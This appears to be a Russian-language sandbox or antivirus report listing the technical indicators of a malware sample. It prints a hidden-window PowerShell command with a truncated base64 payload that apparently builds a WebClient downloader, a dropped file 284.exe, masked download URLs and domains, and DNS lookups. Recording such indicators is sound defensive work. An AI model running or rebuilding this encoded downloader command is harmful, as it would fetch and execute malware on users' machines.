Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADkAXwA4ADQAXwBfAD0AKAAnAHUAXwAnACsAJwA2ADEAMQAnACsAJwAzADYANwAnACkAOwAkAGsANwBfAF8AOQBfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgA4ADcANgA0AF8APQAoAC...
- %HOMEPATH%\284.exe
- %HOMEPATH%\284.exe
- 'he###hytick.com':80
- 'ft##m.com':80
- 'pr#####oportal.com.br':80
- 'pa###r-llc.kz':80
- 'pa###r-llc.kz':443
- http://he###hytick.com/wp-content/uploads/ustpcF6FMZpDg_9RwPnGG
- http://ft##m.com/BZCEsFUe653snDRB
- http://pr#####oportal.com.br/BdSyFxrniPRjsN_K
- http://pa###r-llc.kz/TxIvOOt9Uw
- 'pa###r-llc.kz':443
- DNS ASK he###hytick.com
- DNS ASK ft##m.com
- DNS ASK pr#####oportal.com.br
- DNS ASK pa###r-llc.kz
- DNS ASK ar#####productions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3ADkAXwA4ADQAXwBfAD0AKAAnAHUAXwAnACsAJwA2ADEAMQAnACsAJwAzADYANwAnACkAOwAkAGsANwBfAF8AOQBfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgA4ADcANgA0AF8APQAoAC...' (со скрытым окном)